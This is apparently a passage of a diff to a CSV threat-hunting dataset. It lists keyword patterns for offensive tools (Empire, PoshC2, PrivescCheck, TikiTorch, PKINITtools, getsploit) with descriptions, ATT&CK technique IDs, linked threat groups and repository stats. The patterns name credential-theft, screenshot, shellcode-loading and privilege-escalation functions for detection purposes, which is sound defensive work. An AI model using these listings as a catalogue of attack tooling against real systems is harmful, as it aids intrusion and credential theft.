","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getremoteprocesslisting*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Get-RickAstley*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-RickAstley.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-RickAstley.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*gets4uticket.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" -"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" 
-"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-SccmCacheFolder*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*get-screenshot*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework 
used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-screenshotallwindows*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-SecurityPackages.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ShadowCopies*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*GetShellcode(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. 
The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" -"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1667","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" -"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SitelistFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SiteListPassword*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
